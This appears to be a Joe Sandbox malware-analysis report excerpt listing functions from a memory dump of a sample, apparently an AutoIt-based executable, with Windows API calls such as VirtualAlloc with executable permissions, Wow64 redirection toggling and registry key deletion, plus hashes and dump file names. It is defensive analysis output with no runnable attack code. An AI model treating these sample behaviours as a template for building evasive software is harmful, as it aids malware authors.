                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00887794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: e53319afd06d290922deef174ab57def5a7e90411a116e26e04e0a15c79ec5d9
                                                      • Instruction ID: b53a44c34ae5a8e0d69ea07b7b75cdfb69729c71534eae5ecb2bca305d1f3357
                                                      • Opcode Fuzzy Hash: e53319afd06d290922deef174ab57def5a7e90411a116e26e04e0a15c79ec5d9
                                                      • Instruction Fuzzy Hash: D711E772244208BAEF206F65CC05FEB7779FF89B64F114218FA41D6190D671E851CB20
                                                      Function 00804B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00804B45
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00804AD0), ref: 00804B57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: a2dc6c3f80a40bc974b1b11382852a3ffcbd98ed865185bf325065046d9d5d93
                                                      • Instruction ID: 2617578ce70307da1f1cd7e127bf16967192bc0e383279003a3beacc531665aa
                                                      • Opcode Fuzzy Hash: a2dc6c3f80a40bc974b1b11382852a3ffcbd98ed865185bf325065046d9d5d93
                                                      • Instruction Fuzzy Hash: F7D0C274A00313CFC720AF75DC28B0272D4FF00360B1088399691D22A0D678D880C714
                                                      Function 00804C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00804C11
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804C23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: 9d4b261724dfb38d8a7b49550487a0b85ed7730fc99f1ead0f3e88c187cbe354
                                                      • Instruction ID: 27f6362a9acf38959526e116ccdd6a52aa803903eeb3d87035944fa1c4be8033
                                                      • Opcode Fuzzy Hash: 9d4b261724dfb38d8a7b49550487a0b85ed7730fc99f1ead0f3e88c187cbe354
                                                      • Instruction Fuzzy Hash: 9BD0C270500713CFD7206F74CE0820AB6D5FF08352B008C399591C2291E6B4C880C710
                                                      Function 00804C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00804C44
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00804C56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 964b52cd7842ac7440c1238e03860a2e8d71afae76a2de60b313027393bc052f
                                                      • Instruction ID: 97bcd6aacdd4b3ae4115fa09aafda397d66c564e2c13c99a1e5f5c8339a1877e
                                                      • Opcode Fuzzy Hash: 964b52cd7842ac7440c1238e03860a2e8d71afae76a2de60b313027393bc052f
                                                      • Instruction Fuzzy Hash: 9AD0C770600713CFE7209F35CD0820A72E4FF00361B10883EA6A2C62A1E674C8C0CB20
                                                      Function 00880DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00880DF5
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00880E07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: f5ba3b723f7ab2539c4628ff832836e43d51ff9e946435276e9f5acd89e44e07
                                                      • Instruction ID: 14b3ac5228bedcb64c3236145bbc1b5648c70d1425bb6507bde4afde15354120
                                                      • Opcode Fuzzy Hash: f5ba3b723f7ab2539c4628ff832836e43d51ff9e946435276e9f5acd89e44e07
                                                      • Instruction Fuzzy Hash: 64D0E274550722CFD761AF79C80868776E5FF04752F118C2ED696D2251E6B4D8908B50
                                                      Function 008790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 008790EE
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,0088F910), ref: 00879100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: 9e62178bf8113db74fe3e2223397d940bd3c4737a24273e58c91db6b204835c6
                                                      • Instruction ID: de0a2b79597bec526a796cfd02a94e0c93643523670d3d1372e6a83817ce5c44
                                                      • Opcode Fuzzy Hash: 9e62178bf8113db74fe3e2223397d940bd3c4737a24273e58c91db6b204835c6
                                                      • Instruction Fuzzy Hash: D8D01234510713CFD7209F39D81C64676D4FF05751B51C879D5E5D6650EA78C890CB60
                                                      Function 00841714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: 61dc518b69cacd326b52e97e2f1b38c8ff2243921b15add77cb8f8b7d4db8922
                                                      • Instruction ID: 78336af2a5595c190af79073bbd07df62e9eb745dd565c2a161c13df3df6f09e
                                                      • Opcode Fuzzy Hash: 61dc518b69cacd326b52e97e2f1b38c8ff2243921b15add77cb8f8b7d4db8922
                                                      • Instruction Fuzzy Hash: 75D0177184511CFACF509B909C8D8F9737CFB18309F200562F622E2184E22A9BD4EB21
                                                      Function 0085717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3fdbd76c5f9fc92a8aeeecdfc1fd4ca7cbce33edf3c77cfb2a573e47f1a64a40
                                                      • Instruction ID: 0950dd940aa7409af175c3c6f85859d54f28744d209a78b1bb0c469aebb9c5a9
                                                      • Opcode Fuzzy Hash: 3fdbd76c5f9fc92a8aeeecdfc1fd4ca7cbce33edf3c77cfb2a573e47f1a64a40
                                                      • Instruction Fuzzy Hash: 47C16E74A0421AEFCB14CF98D884EAEBBB5FF48715B148598EC06EB251D730DD85DB90
                                                      Function 0087E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0087E0BE
                                                      • CharLowerBuffW.USER32(?,?), ref: 0087E101
                                                        • Part of subcall function 0087D7A5: CharLowerBuffW.USER32(?,?), ref: 0087D7C5
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0087E301
                                                      • _memmove.LIBCMT ref: 0087E314
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: f508928fab092958d70e30da21e8daf9cb34d4d55f471ccd7ff08ae446cc7245
                                                      • Instruction ID: bf3b04339e06f49780b1deb4cfaf85c66851132e48a0f127b0bdec2e15cc9571
                                                      • Opcode Fuzzy Hash: f508928fab092958d70e30da21e8daf9cb34d4d55f471ccd7ff08ae446cc7245
                                                      • Instruction Fuzzy Hash: 84C14671A083019FC754DF28C88096ABBE4FF89718F14896EF999DB352D730E945CB92
                                                      Function 00878093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 008780C3
                                                      • CoUninitialize.OLE32 ref: 008780CE
                                                        • Part of subcall function 0085D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0085D5D4
                                                      • VariantInit.OLEAUT32(?), ref: 008780D9
                                                      • VariantClear.OLEAUT32(?), ref: 008783AA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: 6623b0368aef5c43fbc00e92ea7d02888d4cc5e23a61884d92162ee943cfb535
                                                      • Instruction ID: 35b8aaff4f89ee90e1e313422a419a5f3f0d5efcbbe7a14cd76035aa8761ea8c
                                                      • Opcode Fuzzy Hash: 6623b0368aef5c43fbc00e92ea7d02888d4cc5e23a61884d92162ee943cfb535
                                                      • Instruction Fuzzy Hash: 42A112756047019FCB40DF28C885A2AB7E4FF89764F148458F99ADB3A2CB30ED45CB92
                                                      Function 00857530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 008576EA
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00857702
                                                      • CLSIDFromProgID.OLE32(?,?), ref: 00857727
                                                      • _memcmp.LIBCMT ref: 00857748
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 8e1fe12b8d2125876486a2aac9c4dc84881dd117c5c88303b2127cbb349aebdf
                                                      • Instruction ID: 67efe29e4a0c0a5b70115dc9bb5d24e4d57cab29b64df67633581ed82be01bd8
                                                      • Opcode Fuzzy Hash: 8e1fe12b8d2125876486a2aac9c4dc84881dd117c5c88303b2127cbb349aebdf
                                                      • Instruction Fuzzy Hash: BC810E75A00109EFCB04DFA8D984DEEB7B9FF89315F208558E505EB250DB71AE0ACB60
                                                      Function 0085687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: ba4785c5112e5762931c9825c46bfbbad03fcd2323098225d34861080476cdc0
                                                      • Instruction ID: ed310cd6cf36d9749df4e1817d5ab54e29dac1bf4c8ea229b945625c0cb0e81b
                                                      • Opcode Fuzzy Hash: ba4785c5112e5762931c9825c46bfbbad03fcd2323098225d34861080476cdc0
                                                      • Instruction Fuzzy Hash: C051E7747003059ADF21AF69D89163AB7E5FF44315F60C81FE986DB292FA30D8588702
                                                      Function 008897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(00A15190,?), ref: 00889863
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00889896
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00889903
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: 794cf92ecd281896703142c694a9275089c3f439a18db07318068454f3bb608c
                                                      • Instruction ID: 82843319f3240ec750f0f96441f5bd63405173d071f95881112abf117739454e
                                                      • Opcode Fuzzy Hash: 794cf92ecd281896703142c694a9275089c3f439a18db07318068454f3bb608c
                                                      • Instruction Fuzzy Hash: 61510B74A00209AFCF10DF68C884ABE7BB5FF55360F148269F995DB2A0D731AD81CB90
                                                      Function 00859A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00859AD2
                                                      • __itow.LIBCMT ref: 00859B03
                                                        • Part of subcall function 00859D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00859DBE
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00859B6C
                                                      • __itow.LIBCMT ref: 00859BC3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
